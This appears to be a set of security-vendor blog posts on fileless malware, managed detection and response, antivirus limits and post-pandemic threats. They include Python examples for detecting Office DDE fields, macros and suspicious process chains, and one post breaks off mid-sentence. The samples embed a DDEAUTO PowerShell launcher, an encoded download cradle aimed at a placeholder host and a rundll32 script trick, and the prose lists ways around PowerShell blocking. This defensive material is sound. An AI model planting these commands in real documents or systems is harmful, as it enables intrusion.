What Hackers Know About Fileless Malware (And You Should Too)

Fileless malware is one of the top cyber threats that can infiltrate a network and cause serious damage. Here is what attackers know about fileless malware, and what you should know too.

What is Fileless Malware?

Fileless malware is malicious code that runs without writing its own executable to the endpoint’s file system; it relies only on the binaries already there. It is typically injected into a running process and executes from RAM. The small footprint and the absence of a new file to scan make it far more difficult for traditional AV and other file-centric endpoint security products to detect or prevent.

There are many ways to run code on a device without dropping an executable. They typically abuse the interpreters and system binaries that ship with, and are trusted by, the operating system.

A few examples include:

  • VBScript
  • JScript
  • Batch files
  • PowerShell
  • mshta.exe and rundll32.exe (or other Microsoft-signed binaries that can be made to run attacker-supplied code)

Malware hidden inside documents is also usually counted as fileless. A data file is not supposed to run code, but vulnerabilities in Microsoft Office and PDF readers let adversaries obtain code execution anyway, and the exploited document can then launch, for example, a malicious PowerShell command. Office also has built-in features that run code from a document, namely macros and DDE fields.

How Does Fileless Malware Work?

Traditionally, AV and other endpoint security products have focused on files (executables) to detect and prevent malware, and there are good reasons for this. Files can be hashed, looked up in reputation services, examined by static analysis and machine learning, and easily excluded when a detection turns out to be a false positive.

But for many attackers, the name of the game is monetary gain: threat actors aim for cost-effectiveness, seeking the highest return for the least effort. The return on file-based malware diminishes as soon as the sample reaches public feeds. If its signature is in circulation two days after release, the attacker’s ROI (return on investment) may be far less than expected, or even negligible.

Over the past few years, threat actors have increasingly turned to fileless malware as a highly effective alternative.

What Hackers Know About Fileless Malware

One reason fileless malware is so compelling is that security products cannot simply block the system files or software these attacks use. If a security admin blocked PowerShell, IT maintenance would suffer. Blocking Office documents or macros would have an even bigger impact on business continuity.

The lower footprint and lack of “foreign” executables to scan make it difficult for traditional AV and other endpoint security products to detect or prevent these kinds of attacks.

Enterprises understand that a lack of effective protection from fileless malware could leave them extremely vulnerable. Security vendors consequently came under pressure to address this growing threat and bolted on all kinds of features to claim (or demo) “fileless attack” coverage.

Fileless Attacks

Fileless ransomware is ransomware that does not rely on a dropped executable to infect a system. Instead, it uses malicious scripts or code that are injected directly into memory or run through legitimate applications. This makes it harder to detect and remove, because there is no payload file on disk for security products to scan and identify.

Fileless ransomware is often spread through phishing emails or malicious websites that exploit vulnerabilities in web browsers or other software programs. Once a system is infected, fileless ransomware can encrypt important files or steal sensitive information. In some cases, fileless ransomware can also give attackers remote access to an infected system.

How to Protect Against Fileless Ransomware

There are several steps that can be taken to help protect against fileless malware attacks, including:

  • Keeping software updated with the latest security patches
  • Using a reliable anti-virus or anti-malware product, preferably one that monitors process behavior rather than only file signatures
  • Not opening suspicious email attachments or clicking links in emails from unknown senders
  • Installing and running a firewall
  • Backing up important files and data regularly, to storage the endpoint itself cannot overwrite

Fileless Attack Vectors

There are a number of different attack vectors that can be used to launch a fileless ransomware attack. Some of the most common include:

  • Malicious scripts or code embedded in email attachments or websites
  • Exploits that take advantage of vulnerabilities in web browsers or other software programs
  • Infected USB drives
  • Social engineering techniques that trick users into running malicious code

Petya/NotPetya, WannaCry and Locky are often cited as fileless examples, but each ultimately dropped an executable payload to disk; fileless techniques appear only in parts of their chains, such as Locky’s macro-launched downloaders and NotPetya’s use of WMI and PsExec for lateral movement.

Fileless Malware Detection Techniques

Unfortunately, many of the vendor attempts to solve the problem are less than ideal. Here are some of the common approaches, and why they fall short:

  • Blocking PowerShell – as noted above, PowerShell has become an essential tool for IT teams and has largely replaced cmd.exe as the default Windows command-line shell. Blocking it would cause severe disruption. More importantly, from a defensive point of view blocking it is futile: there are several ways to run PowerShell code that bypass a block on PowerShell.exe. To name a few:
    • Load the PowerShell engine (System.Management.Automation.dll) from another host process, for instance through a small DLL run with rundll32, so PowerShell.exe never starts.
    • Wrap PowerShell scripts in an EXE with tools like PS2EXE.
    • Ship a private copy of PowerShell.exe, or modify the local one, so that security products keyed on the known binary no longer recognize it.
    • Embed a PowerShell script in the pixels of a PNG file and generate a one-liner that extracts and executes it, using Invoke-PSImage.
  • Blocking MS Office macros – to shrink this attack vector, Microsoft added a Group Policy setting to block macros in Office files from the internet (starting with Office 2016), and since 2022 Office blocks such macros by default. Many environments still allow them, so security vendors have mainly tackled this in two ways:
    • Block macros across the board – this enforces the same restriction Microsoft already offers and only suits organizations that can do without macros.
    • Extract the macro code for static analysis or reputation checks – this works in some cases, but macro code is hard to classify within a tolerable false-positive rate, especially for never-before-seen malicious macros, and few corpora of benign and malicious macro code exist to learn from. Another option is to look for functions commonly found in attacks (Shell, CreateObject, URLDownloadToFile and the like), but these vary and are not comprehensively catalogued.
  • Server-side detection – some products only collect on the agent and make the decision on the server or in the cloud. This approach has the same disadvantages as any detection that does not happen on the
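One practical check that follows from the macro and DDE discussion above, and from the “extract the macro code” approach in the list, is a static triage of the document package itself before any macro is parsed. The script below is an added example, not code from the original page or from Cybriant. It builds three minimal OOXML packages in memory (the sample XML and the placeholder vbaProject.bin bytes are constructed for the demo, not real Word output) and reports which of the two built-in code-execution features each one carries.

```python
"""Added example (not code from the original page or from Cybriant): static
triage of an OOXML Word file for the two built-in code-execution features
discussed above, VBA macros and DDE fields.  The sample documents are
constructed in memory; they are minimal packages, not real Word output."""
import io
import re
import zipfile

# Field instructions live in <w:instrText> runs (often split across several
# runs) or in the w:instr attribute of <w:fldSimple>.
INSTR_TEXT = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
FLD_SIMPLE = re.compile(r'<w:fldSimple[^>]*\bw:instr="([^"]*)"')
DDE_FIELD = re.compile(r"\bDDE(?:AUTO)?\b", re.I)


def triage_ooxml(data: bytes) -> dict:
    """Report macro and DDE indicators for a docx/docm byte string.

    The checks key off package contents, not the file extension, so a .docm
    renamed to .docx is still caught."""
    result = {"vba_project": False, "macro_enabled_type": False, "dde_fields": []}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = pkg.namelist()
        result["vba_project"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if "[Content_Types].xml" in names:
            types_xml = pkg.read("[Content_Types].xml").decode("utf-8", "replace")
            result["macro_enabled_type"] = "macroEnabled" in types_xml
        for name in names:
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = pkg.read(name).decode("utf-8", "replace")
            # Word concatenates split instrText runs, so join them without a
            # separator: "DDE" in one run and "AUTO ..." in the next is one field.
            instruction = "".join(INSTR_TEXT.findall(xml)) + " " + " ".join(FLD_SIMPLE.findall(xml))
            instruction = " ".join(instruction.split())
            if instruction and DDE_FIELD.search(instruction):
                result["dde_fields"].append((name, instruction[:120]))
    result["suspicious"] = result["vba_project"] or bool(result["dde_fields"])
    return result


def build_doc(document_xml: str, with_vba: bool) -> bytes:
    """Construct a minimal OOXML package for the demo (constructed data)."""
    main_type = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_vba else
                 "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types><Default Extension="xml" ContentType="application/xml"/>'
                     f'<Override PartName="/word/document.xml" ContentType="{main_type}"/></Types>')
        pkg.writestr("word/document.xml", document_xml)
        if with_vba:
            # Placeholder bytes standing in for a compiled VBA project.
            pkg.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder VBA project")
    return buf.getvalue()


BODY = "<w:document><w:body><w:p>{}</w:p></w:body></w:document>"
BENIGN_DOC = build_doc(BODY.format("<w:r><w:t>Quarterly report</w:t></w:r>"), with_vba=False)
MACRO_DOC = build_doc(BODY.format("<w:r><w:t>Enable content to view</w:t></w:r>"), with_vba=True)
DDE_DOC = build_doc(BODY.format(
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\Windows\\System32\\cmd.exe '
    '"/k powershell -nop -w hidden -c calc" </w:instrText></w:r>'), with_vba=False)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("macro", MACRO_DOC), ("dde", DDE_DOC)):
        print(label, triage_ooxml(doc))
```

Real attachments also arrive as RTF, MHT and legacy binary .doc files, which are not zip packages, so this check covers OOXML only; treat it as a cheap first filter in front of a full parser such as oletools, not as a replacement for one.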

What can be done to mitigate such attempts?

The key is to look at the behavior of the processes executing on the endpoint rather than at the files on disk. This works because, despite the large and growing number of malware variants, they operate in very similar ways: the number of distinct malicious behaviors is far smaller than the number of ways a malicious file can look, which makes behavior a better basis for both prevention and detection.

The behavioral approach is also agnostic to the delivery vector, which is why it handles fileless attacks so well: a macro, a browser exploit, a phishing link and an infected USB drive all end up spawning the same kinds of suspicious processes on the endpoint.

How to Detect Fileless Malware

Through our Managed Detection and Response service, Cybriant’s security team monitors activity on the agent side at the kernel level to separate malicious from benign behavior. Because the agent already holds the full context (users, processes, command-line arguments, registry, files on disk and external communication), a malicious flow can be mitigated as a whole: its changes are rolled back and the user continues working on a clean device.

We help you avoid the hidden costs of keeping your entire network clean of malicious code.

To implement this approach effectively, Cybriant employs the concept of “Active Content”, which solves the problem of apportioning blame to the root cause of malicious activity.

For example, suppose a user opens a malicious attachment from Outlook, and the resulting process tries to encrypt files on disk. Blaming and quarantining Outlook as the parent process would miss the true source of the malicious activity. Outlook should instead be recorded as context for forensics, not mitigated against, while the entire threat group beneath the attachment is mitigated, regardless of any additional files dropped, registry keys created or other harmful behavior.

Using Active Content lets us determine, and point the blame towards, the root cause of a given malicious flow, with or without a file, and lets the customer handle the incident accurately.
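The behavioral approach described under “What can be done to mitigate such attempts?” and the root-cause attribution described in the Outlook example can both be shown on a small process tree. The script below is an added example, not Cybriant’s code or a description of its product internals; the process-creation events are constructed to resemble the fields of a Sysmon Event ID 1 record, the rule thresholds and the launcher list are assumptions, and the encoded PowerShell is generated in the script so it decodes cleanly. It flags the suspicious events, walks up the parent chain to the highest ancestor that is not a plain launcher, and reports that ancestor as the root to mitigate with the launcher kept as context only.

```python
"""Added example (not Cybriant's code): behavior-based detection over
process-creation telemetry plus root-cause attribution.  Events are
constructed to resemble Sysmon Event ID 1 fields; none come from a real host."""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-cased image basename
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
# Processes that merely launched the activity: forensic context, never blamed
# or killed (the Outlook case from the text).  Assumed list for the demo.
LAUNCHERS = {"explorer.exe", "outlook.exe", "services.exe"}

ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
NO_PROFILE = re.compile(r"-nop(?:rofile)?\b", re.I)
SUSPICIOUS_PS = re.compile(r"IEX|Invoke-Expression|DownloadString|FromBase64String|Net\.WebClient", re.I)
LOLBIN_PATTERNS = {
    "rundll32.exe": re.compile(r"javascript:", re.I),
    "mshta.exe": re.compile(r"https?://|vbscript:|javascript:", re.I),
    "regsvr32.exe": re.compile(r"scrobj\.dll|/i:https?://", re.I),
}


def decode_encoded_command(cmdline: str):
    """Plaintext of a -EncodedCommand argument (UTF-16LE in base64), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent, by_pid: dict) -> list:
    """Reasons this one event looks malicious; an empty list means benign."""
    reasons = []
    parent = by_pid.get(ev.ppid)
    if parent and parent.image in OFFICE_APPS and ev.image in SCRIPT_HOSTS:
        reasons.append(f"{parent.image} spawned {ev.image}")
    if ev.image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(ev.cmdline)
        if decoded and SUSPICIOUS_PS.search(decoded):
            reasons.append("encoded command fetches and runs remote code")
        if HIDDEN_WINDOW.search(ev.cmdline) and NO_PROFILE.search(ev.cmdline):
            reasons.append("hidden window with profile disabled")
    pattern = LOLBIN_PATTERNS.get(ev.image)
    if pattern and pattern.search(ev.cmdline):
        reasons.append(f"{ev.image} used as a script host")
    return reasons


def analyze(events: list) -> list:
    """Flag events, then group each detection under its root cause: the highest
    ancestor that is not a launcher.  Its whole subtree is the threat group."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e.pid)
    reasons = {e.pid: classify(e, by_pid) for e in events}
    findings, seen_roots = [], set()
    for pid in (p for p, r in reasons.items() if r):
        root = by_pid[pid]
        while root.ppid in by_pid and by_pid[root.ppid].image not in LAUNCHERS:
            root = by_pid[root.ppid]
        if root.pid in seen_roots:
            continue
        seen_roots.add(root.pid)
        stack, group = [root.pid], []
        while stack:                      # collect the whole subtree
            cur = stack.pop()
            group.append(cur)
            stack.extend(children.get(cur, []))
        context = by_pid.get(root.ppid)
        findings.append({"root": root.image,
                         "context": context.image if context else None,
                         "mitigate": sorted(group),
                         "reasons": {p: reasons[p] for p in group if reasons[p]}})
    return findings


# Constructed telemetry: Outlook -> Word opens an attachment -> macro starts an
# encoded PowerShell download cradle -> PowerShell abuses rundll32.  A separate
# admin-launched PowerShell under Explorer is benign.  example.invalid is a placeholder.
STAGE2 = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')".encode("utf-16le")).decode("ascii")
EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "outlook.exe", '"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"'),
    ProcEvent(300, 200, "winword.exe", '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\jane\\AppData\\Local\\Temp\\invoice.docm"'),
    ProcEvent(400, 300, "powershell.exe", f"powershell.exe -nop -w hidden -enc {STAGE2}"),
    ProcEvent(500, 400, "rundll32.exe", 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";new ActiveXObject("WScript.Shell").Run("calc.exe")'),
    ProcEvent(600, 100, "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

On the constructed events this yields a single finding rooted at winword.exe with outlook.exe as context and pids 300, 400 and 500 in the mitigation set, while the admin’s PowerShell under Explorer (pid 600) is left alone. The walk-up rule is the important design choice: the Office process that opened the attachment is blamed even though nothing about its own command line looks malicious, and the mail client above it is not.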


7 Reasons to Consider Managed Detection and Response Services

Managed Detection and Response services have become vital in this ‘work from home’ age. For many employees, working from home has boosted productivity and employee morale. It has also boosted security concerns for many IT departments. 

Since many organizations may have to deal with a remote workforce for an undetermined amount of time, it’s important to consider Managed Detection and Response services to protect your organization’s data. 

What is Managed Detection and Response? 

MDR is an outsourced managed security service that delivers monitoring, detection and response, most commonly centered on endpoints. It provides deeper detection than a standalone antivirus plus the ability to stop malware in its tracks, and typically uses AI and machine learning for its analysis.

According to Gartner, Managed detection and response (MDR) providers deliver 24/7 threat monitoring, detection, and lightweight response services to customers leveraging a combination of technologies deployed at the host and network layers, advanced analytics, threat intelligence, and human expertise in incident investigation and response. MDR providers undertake incident validation, and can offer remote response services, such as threat containment, and support in bringing a customer’s environment back to some form of “known good.”

MDR service providers, like Cybriant, typically focus on threat detection and analytics. Automation is used in our MDR technology, but experienced experts are required to watch that technology on a 24/7 basis. Plus, MDR from Cybriant is all about Remediation…not just Response.

What is MDR Technology?

Our security platform uses artificial intelligence to track and contextualize every single activity on your computer systems. The Cybriant security platform will pinpoint malicious acts in real time and automatically stop them in their tracks before they become a threat.

When your team works remotely, you’re open to new threats, from the smart TV to the connected printer, and everything in between.  Protect your workforce from every avenue of attack with Cybriant MDR.

Malware doesn’t need a connection to attack, and neither should your cybersecurity. Cybriant delivers Online/Offline Protection across any platform or OS—because if your security only works online, it doesn’t work.

Plus, with Cybriant’s team of security analysts watching your network 24/7, you’ll always be protected. 

7 Reasons to Consider Managed Detection and Response Services


#1. Establish WFH (Work from Home) Best Practices

It’s reasonable to assume that around 30% of the workforce remains working from home.

So it makes sense to adopt the best remote working technology practices now so that when things do return to normal, your business is set to reap these benefits and have accelerated growth.

The right system tools and hardware play a big part in enabling a happy and productive remote workforce.  

Remote work was viable even before the COVID-19 pandemic. Then the majority of companies transitioned to it, if only temporarily, which made that viability plain.

Research into the likelihood that different occupations could work remotely going forward found:

  • 34% of American jobs could “plausibly be performed from home”;
  • Up to 29% of Argentinians and 34% of Uruguayan workers are in occupations doable remotely;
  • In Europe, the same holds for 24% of workers in Italy, 28% in France, 29% in Germany, 25% in Spain, and 31% in Sweden and the UK.

When employees work from home, they face unknown threats and new attack surfaces. Managed Detection and Response services will protect most of the endpoints that your employees have access to. 

#2. Ransomware Attacks Can Happen To You

Ransomware is a well-named type of cyberattack: cybercriminals who take this approach kidnap your data. After gaining access to your network, they encrypt files and demand payment for the decryption key.

Cybercriminals rely on your false confidence. We’ve all been guilty of thinking, “it won’t happen to me.” All organizations, especially small to medium businesses, are targeted. Large enterprise organizations may have the resources they need to protect their networks, but mistakes are common in a DIY environment. 

A common method is to send out phishing emails in the hope that people will enter their access credentials. Targeted business communication emails work too: the attacker gets to know your business first, then sends an email impersonating a colleague, supplier or customer asking you to take action or update contact details by clicking a link or downloading a file.

In a recent article, we explained in depth the Top Ransomware Threats of 2020. Managed Detection and Response services are vital to prevent ransomware attacks from executing. 

Ransomware Spreads Fast

Ransomware is malware, and malware that can propagate on its own does not stop at one machine. If Jane from accounting opens a ransomware file, every computer on the business network could be infected, and worms spread between businesses too. Consider the debilitating WannaCry ransomware attack of 2017: within four days of its first detection in Europe, the strain had spread to 116 countries.

Be prepared for more ransomware in 2021. Cybersecurity Ventures has predicted that, globally, businesses in 2021 will fall victim to a ransomware attack every 11 seconds, down from every 14 seconds in 2019. That figure is based on historical cybercrime figures. It is estimated that the cost of ransomware to businesses will top $20 billion in 2021 and that global damages related to cybercrime will reach $6 trillion. Yes, that is with a “T”.

#3. You Need 24/7 Coverage But Don’t Have The Resources

The cybersecurity skills shortage is one of the trends we can expect to see in 2021. It’s not easy to staff a security operations center (SOC) with skilled individuals, plus try staffing around the clock. You may have a team that is dedicated to your IT department, but they are also helping to support your business. Running a 24/7 SOC is our only business. 

A recent study from (ISC)2 claimed the global security workforce needs to grow by a staggering 145% to meet hiring demand. In Europe the shortfall is concentrated in smaller companies with 1-99 employees and in those with over 500 employees.

Unsurprisingly, over half (51%) of cybersecurity professionals said their organization is at moderate or extreme risk due to staff shortages.

This is the #1 reason to consider outsourcing some or all of your security needs. Here are 9 Unique Reasons to Outsource Cyber Security Monitoring. 

#4. You Know You Need Threat Detection, but Do You Need a SIEM

Managed Detection and Response (MDR) and SIEM are different solutions but they are complementary to each other and work well together, especially in a managed solution – we have a service called PREtect that uses both as well as vulnerability management.

A well-tuned SIEM should outperform MDR at detection, because detection across many log sources is what a SIEM is for. But a SIEM is only as good as the team that responds to what it finds; one that only produces noise nobody can act on is effectively pointless.

An MDR service should outperform a SIEM at prevention, because it is built around endpoint prevention and analysis. Both require staff training, tuning and maintenance.

However, the distinctions between the two blur their common purpose and obscure the importance of a holistic cybersecurity platform in the enterprise network. Cybersecurity solutions perform optimally when they integrate effectively with each other and utilize their different capabilities.

#5. Cyberattacks Are Costly, Prevention Is Not

Once ransomware runs on your system, it locks down your files. To regain access you need the decryption key the attacker supplies when you pay up, that is, if they keep their end of the bargain once you pay the ransom. These are crooks you’re dealing with, after all!

In Coveware’s analysis of Q3 2019, the average ransom payment increased by 13% to $41,198 as compared to $36,295 in Q2 of 2019. And that’s just the cost of the ransom. Indirect costs include the cost of downtime, lost revenue, and long-term brand damage. There’s also the expense of removing the ransomware, forensic analysis, and rebuilding systems.

The average ransomware attack in Q3 2019 resulted in 12.1 days of downtime. — Coveware

Ransomware is a lucrative, relatively easy mode of attack for cybercriminals, and they could target your business. Prevention in the form of Managed Detection and Response services costs significantly less than dealing with a ransomware attack.

#6. You Can See What AntiVirus Has Missed

Many organizations are not comfortable removing their antivirus product completely. Very often, clients will utilize Managed Detection and Response (MDR) security services to determine just how much their current AV has missed. You’ll have the ability to detect and prevent hidden exploit processes that are more complex than a simple signature or pattern and evade traditional antivirus.

5 major cyber threats can make it through your antivirus. Read more here. 

#7. AI-based Technology + Skilled Humans are an Excellent Combination

We write a lot about how antivirus isn’t enough to protect your endpoints anymore. When you combine AI-based technology with skilled security analysts that are watching your systems around the clock, you should feel confident that your remote workforce is secure. 

Cybriant Managed Detection and Response Services

Our team of security experts will help stop advanced threats at the endpoint with Cybriant MDR. We utilize AI-based next-gen antivirus that will help you:

PREVENT: Our expert security analysts monitor and record all the events that occur on your endpoints. Our team focuses on relevant threats that attempt data exfiltration or modification. When a process attempts one of these suspicious actions, an alert is triggered and the attack is halted in real time.

DETECT: When a credible threat is detected, our system will retrieve the process history and our team will analyze the chain of events in real-time and determine the validity of the threat. You’ll receive alerts when threats are detected along with advice and insight from our cybersecurity team to help you mitigate and respond to the threat.

REMEDIATE: Once identified, the malicious activity is immediately stopped in its tracks, and our team guides you through the remediation. This remediation process provides astonishing insight into the data of the threat. You’ll be able to help your organization reduce its attack surface by learning how you’ve been compromised.

Conclusion

The global economy is slowly mending, yet it’s safe to say remote work is likely to remain part of the new business as usual. That means CIOs need to make changes to their tactics and find ways to ensure a secure organization even when they are working remotely. We recommend Cybriant MDR – Managed Detection and Response services. 


Warning: These Cyber Threats Will Make it Through Your Antivirus!

If you depend on an antivirus, please be aware that it is more than likely to let you down. More importantly, some threatening cyber threats are well-known to get past antivirus and cause major problems. 

This is How Your Antivirus is Letting You Down

Common sense is the best way to avoid malware, but it does not make you safe from attack. Even the most careful user can be infected in an instant and spread the infection faster than a sneeze in flu season. The common assumption is that your antivirus will help you; we recommend a next-generation antivirus that can prevent malware from executing at all.

First of all, let’s discuss how your traditional antivirus is letting you down:

Advertising: Much like a free app that makes its money from in-app purchases, free antivirus software pushes for payment. Expect pop-ups nagging you to buy the paid version at least daily. Some free options also try to change your browser home page and default search engine, an inconvenience you may be stuck with. Even paid products find ways to upsell you to a higher tier or a new add-on.

Effectiveness: It’s fair to expect your antivirus to detect malware, and head-to-head testing shows free and paid products are about equal at catching known infections. And therein lies the catch: generally speaking, a signature-based antivirus needs a signature for a sample before it can detect it. Next-gen antivirus adds AI and machine learning, basing detection on suspicious behavior, origin and attributes, which catches samples no one has catalogued yet.

Features: Free antivirus options are usually created from the paid version, taking out everything except the bare minimum. Some paid antivirus may form more secure protection against attacks. However, hackers have advanced beyond simple tactics and it’s not just about avoiding email attachments anymore.

Support: Free antivirus options are the most popular choice because they’re… free. Obviously. This also means there’s generally no support available. If there’s a problem or conflict with another program, you may find yourself without protection until it can be resolved. When coupled with our MDR service, next-gen antivirus offers 24/7 around-the-clock monitoring.

Cyber Threats That Will Make it Through Your Antivirus

You understand by now that your antivirus is letting you down. But, did you know that by relying on antivirus alone, you could potentially allow these common cyber threats onto your network, putting your corporate data at risk?

Advanced Threats. Legacy antivirus depends on prior knowledge to detect threats. Adversaries have access to nation-grade hacking tools, which means new threats appear daily. AI and machine learning give us the ability to detect and validate suspicious activity that has no signature yet.

Polymorphic Malware. Samples that re-pack or re-encrypt themselves on every build defeat signature-based antivirus that checks a file’s hash against a database of known-bad hashes, because each copy has a hash nobody has seen before.

Malicious Documents. A maliciously crafted document exploits a vulnerability in the application that opens it to achieve code execution; the document itself is a one-off with no reputation for legacy AV to check.

Fileless Malware. Attackers have realized that traditional AV has a gaping blind spot: malicious code can run in memory without dropping the telltale files that AV scanners look for.

Encrypted Traffic. Malicious actors hide their activity from network inspection by encrypting traffic between the victim and their command-and-control (C2) server, typically with TLS, so a network sensor sees the destination but not the content.
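To make the polymorphic point concrete, here is an added example (not code from the page or from Cybriant) with a constructed packer: the payload is inert text, the stub is a plain XOR with a random per-build key plus random junk, and nothing here is the code of any real malware family. It shows that a hash blocklist built from the one sample a vendor has captured matches only that sample, while hashing what the stub decrypts matches every variant, which is the logic behind emulation and in-memory scanning.

```python
"""Added example (not from the original page): why a hash blocklist fails
against polymorphic samples while inspecting the unpacked payload does not.
The 'payload' is inert text and the packer is a constructed XOR stub, not the
code of any real malware family."""
import hashlib
import os
import struct

PAYLOAD = b"inert demo payload standing in for the malicious routine"


def pack(payload: bytes, key: bytes, junk: bytes) -> bytes:
    """One polymorphic build: header(key len, junk len) | key | junk | XOR body.
    A fresh key and fresh junk per build mean no two files share a hash."""
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return struct.pack("<HH", len(key), len(junk)) + key + junk + body


def unpack(sample: bytes) -> bytes:
    """Undo the stub: roughly what an emulator or memory scan sees at run time."""
    key_len, junk_len = struct.unpack("<HH", sample[:4])
    key = sample[4:4 + key_len]
    body = sample[4 + key_len + junk_len:]
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_variants(count: int) -> list:
    """Rebuild the same payload `count` times with random key and junk.
    Junk length grows per build, so variants differ in size as well as content."""
    return [pack(PAYLOAD, os.urandom(16), os.urandom(8 + i)) for i in range(count)]


def file_hash_hits(samples, blocklist) -> int:
    """Legacy approach: match the on-disk file hash against known-bad hashes."""
    return sum(sha256(s) in blocklist for s in samples)


def unpacked_hash_hits(samples, blocklist) -> int:
    """Run the stub first, then match what actually executes."""
    return sum(sha256(unpack(s)) in blocklist for s in samples)


if __name__ == "__main__":
    variants = build_variants(5)
    seen_once = {sha256(variants[0])}      # the one sample a vendor has already captured
    print("distinct file hashes:", len({sha256(v) for v in variants}))
    print("file-hash hits:", file_hash_hits(variants, seen_once))
    print("unpacked hits:", unpacked_hash_hits(variants, {sha256(PAYLOAD)}))
```

Real packers go further than this stub: they rewrite the decoder itself on each build and check for sandboxes before unpacking, so even unpack-then-hash is a starting point for behavior-based detection rather than the finish line.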

Consider Cybriant MDR

Consider Cybriant MDR to help you detect threats that antivirus will certainly miss. Learn more here: cybriant.com/mdr. 

Forecasting Cyber Threats After The COVID-19 Pandemic

As the news changes on an almost daily basis, it’s difficult to know what to expect after the pandemic. Here is a review of the existing threats and how your company can prepare for the world during and after the pandemic. 

It is no secret that the COVID-19 pandemic is an unprecedented health and economic crisis affecting the wellbeing of employees. It has disrupted many businesses and business operations globally, but one area many may have overlooked is cybersecurity.

As a result of the coronavirus outbreak, cybercrimes have skyrocketed. Scammers are now launching fraudulent campaigns that cash in and feed off the cybersecurity gaps occasioned by emergencies and the necessity to adopt new working models.

In this post, we take a peek at the existing cyber threats, what to expect post the pandemic, and how your company can prepare for the inevitable. Let’s dig in:

Cybersecurity Risks in the COVID 19 Context

Some of the leading cyber crimes emanating from the COVID-19 crisis include:

Phishing attacks using the COVID-19 disease as bait

Fraudsters have been sending malicious emails impersonating government agencies and departments in charge of dispensing government-funded COVID-19 support initiatives. Such emails are usually designed to direct the recipient to a fake website where they are deceived to enter their personal and financial information.

Malware distribution using the pandemic as bait

Hackers have been leveraging human traits such as curiosity and concern around the coronavirus outbreak to deploy malware. In most cases, they send emails (with subject lines containing COVID-19-related phrases such as “Coronavirus Update”) that persuade the victim to download a malicious file from a website.

To create an impression of authenticity, the fraudsters spoof sender information in an email to make it look like it came from a trustworthy source, such as the World Health Organization (WHO).

Supply chain and remote working threats

As the pandemic spread, governments invoked containment measures such as social distancing and self-imposed or government-imposed quarantines, forcing companies to shift to remote working.

Fraudsters have taken advantage of this massive move to launch more attacks by exploiting various vulnerabilities in remote working tools. Since the recently deployed remote workers have had less training regarding the required security protections due to the current implementation rush, they are more prone to attacks.

Cybersecurity Risk Post-COVID 19

The COVID-19 outbreak is accelerating the trend towards telework, and we may see a more permanent shift towards telecommuting. As such, enterprises will continue facing the following challenges:

  • Telework will open multiple vectors for cyberattacks on employees due to increased use of personal devices and dependency on home and public networks.
  • Critical business assets will be at risk of being exposed to targeted and opportunistic cyberattacks by fraudsters and other malicious organizations seeking to exploit vulnerabilities and plant seed for possible future attacks.
  • Critical public sector services such as healthcare will remain under pressure and will continue to be hit hard by new ransomware strains and by denial-of-service attacks aimed at disrupting connectivity.
  • Ransomware targeting supply-chains and online services will also be on the rise. Weakened organizations will be more vulnerable.

This begs the question: how will companies prepare for the inevitable?

A Robust Cybersecurity Response after COVID 19

Organizations will need to execute robust cybersecurity measures to prevent further crises. Beyond COVID-19, these seven areas will require attention.

#1. Teleworking solutions

Since we anticipate a permanent increase in telework, organizations should consider:

  • Procuring sufficient on-demand bandwidth for communication and content sharing, especially video conferencing across geographically dispersed sites.
  • Managing identity and access for remote staff to meet corporate security requirements as well as employees’ ease-of-use needs.
  • Deploying secure connectivity to staff workstations, such as IPsec-based VPN clients.

#2. External perimeter protection

Remote connections will undoubtedly increase an enterprise’s cyber-attack surface. Businesses may protect their external perimeters by:

  • Locking down staff workstations as well as company-based laptops with advanced security settings. This includes managing configurations centrally, and not giving administrative privileges to end-users.
  • Deploying network access control (NAC) as a solution that will help authenticate and validate devices, as well as enforce security policies before allowing them to connect to company networks.
  • Deploying solutions that enable remote endpoint data collection and analysis to help identify unauthorized activity.

#3. Cloud services

Cloud services offer many benefits over on-premises storage and application hosting, but they have to be adopted and managed deliberately: usage within the enterprise needs to be monitored, the related security policies enforced, and cloud-hosted data guarded against malware. Companies should consider:

  • Adopting formal strategies for the use of cloud services.
  • Defining data storage regulations outlining the requisites for the use of cloud services, data center storage, and local storage, especially for crucial information.

#4. Secure collaboration tools

